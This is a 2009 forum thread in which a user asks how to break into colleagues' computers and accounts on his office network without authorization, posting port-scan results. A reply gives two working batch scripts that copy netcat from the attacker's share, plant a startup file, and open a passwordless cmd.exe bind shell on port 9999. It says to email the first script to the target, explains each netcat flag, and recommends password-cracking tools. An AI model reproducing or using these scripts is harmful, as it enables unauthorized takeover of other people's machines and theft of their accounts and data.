Need help for .,.,. Hacking LAN and user accounts .,.,. $$

Discussion in 'Ethical hacking' started by TazBath, Jun 8, 2009.

  1. TazBath

    TazBath New Member

    Joined:
    May 29, 2009
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Hi there,


    I want to hack my LAN network of my office, for that I will give you info what I have tried to do but still not succeed.

    How can I access machines in my LAN without administratrion rights.,.,.?

    Whenever I am opening my colleege's than getting error as mentioned below.




    "\\____\_____\_____\My Documents is not accessible. You might not have permission to use this network resource. Contact the adminstrator of this server to find out if you have access permissions.


    Access is Denied."




    and I have also tried from the "My Network Places" from that I got so many other thigs of other database.


    now some info about what I do to hack LAN.

    I got all the info about my servers and useraccounts through "Advance Port Scanner."
    I tried to send some message in LAN in some machine I got success.
    I can get info about who are logged in the machines.
    I can get all the ips with open ports of my LAN.

    I got many of info like mention below:

    =========================================
    Drives:

    Transports:

    Computer number: 5
    Name: AFICIO
    IP address: _______________
    MAC address: _________________
    OS: Windows 9x 1.9
    Remote Time Of Day: no information
    Registry information:
    build number:
    type:
    OS path:
    software ID:
    software name:
    registered organization:
    registered computer owner:
    OS type:
    OS installation path:
    system root path:
    processor name:
    processor speed: no information
    Run:
    HotFixes:
    Ports ( 66 scanned, 5 opened, 61 closed )
    Port 23 - open
    Port 80 - open
    Port 139 - open
    Port 515 - open
    Port 514 - open
    NetBIOSNames:
    AFICIO ( Workstation Service )
    AFICIO ( File Server Service )
    Services:
    Groups:
    Users:


    Shares:

    AFICIO2018D ( _____ _____ )
    IPC$ ( )

    Drives:

    Transports:

    Computer number: 6
    Name: ____
    IP address: _________
    MAC address: ___________
    OS:
    Remote Time Of Day: no information
    Registry information:
    build number:
    type:
    OS path:
    software ID:
    software name:
    registered organization:
    registered computer owner:
    OS type:
    OS installation path:
    system root path:
    processor name:
    processor speed: no information
    Run:
    HotFixes:
    Ports ( 66 scanned, 5 opened, 61 closed )
    Port 80 - open
    Port 88 - open
    Port 135 - open
    Port 139 - open
    Port 445 - open
    NetBIOSNames:
    ____01 ( Workstation Service )
    ____NET ( Domain Name )
    ____NET ( Domain Controllers )
    ____01 ( File Server Service )
    ____NET ( Browser Service Elections )

    Services:
    ____________________________________________
    ______________________
    ______________________
    ____________________________________________

    Groups:
    ____________________________________________
    ______________________
    ______________________
    ____________________________________________


    Users:

    Name: Administrator
    Home dir: _____________________________
    Comments: Built-in account for administering the computer/domain
    Logon script path:
    Full name:
    User comments:
    Applications params:

    ____________________________________________
    ______________________
    ______________________
    ____________________________________________


    ================================================== ================================


    I think all of you experts have got all the base what I want to say, see I am not a adminstrator or network engineer or IT person, I am just in my learning process in this IT Field and I choose networking for my career.

    I think one I will also be experts like mamy of you.

    Finally How can I access other machines and users accounts without Adminsitrator rights in LAN.,.,.????
    I am accepting any kind suggestions for hacking or cracking tools OR scripts or anything.,.,.$$

    and I know hackers can help me out .,.,. $$
     
  2. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    746
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
  3. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    746
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
    With netcat you can create a batch file that does the following, we will save this batch file as nccopy.bat:

    @echo off

    cd\
    c:
    xcopy \\[YOUR IP]\[NAME OF SHARED FOLDER]\[THE FOLDER WHERE NETCAT IS LOCATED]\nc.exe
    cd "Documents and Settings"
    cd "All Users"
    cd "Start Menu"
    cd "Programs"
    cd "Startup"
    xcopy \\[YOUR IP]\[NAME OF SHARED FOLDER]\[THE FOLDER WHERE NETCAT IS LOCATED]\startnc.bat
    nc.exe -L -p 9999 -d -e cmd.exe

    This will be your first batch file, the second one that you will use is named startnc.bat, its the file you want to run on the computer at startup... It goes like this:

    @echo off

    cd\
    c:
    nc.exe -L -p 9999 -d -e cmd.exe


    Thats all, now you email the first batch file named nccopy.bat to the target computer, then he/she executes the file which will then look for your computer, look for a shared folder on your computer which he/she has access to, look for the netcat directory in the shared folder and then copy netcat to the C: drive, it will then browse to the startup folder of the target computer and then copy the startnc.bat file again from your computer's shared folder to his/hers startup folder. The startnc.bat will then run every time when the computer is switched on, you will then have port 9999 open constantly on the target computer which will then allow you to connect to that port without needing username or passwords. You must connect to that port through telnet and once you do, netcat running on the target computer will then execute cmd.exe for you, you will be in the system32 directory and have full control of the computer.
     
  4. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    746
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
    Also the commands you give netcat means the following:

    nc.exe (The Application itself)
    -L (Constantly listen on a specified port)
    -p (The port)
    -d (Means that it if the command promp window is closed netcat will still be running)
    -e (The exe you want to execute once a connection has been made to the port that you specified)

    Hope it helps, thats just one of the many wonders you can do with netcat...
     
  5. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    746
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
    Also get cain & abel, very nice for cracking passwords once you are on the network, and thc hydra is very good for cracking passwords remotely...
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice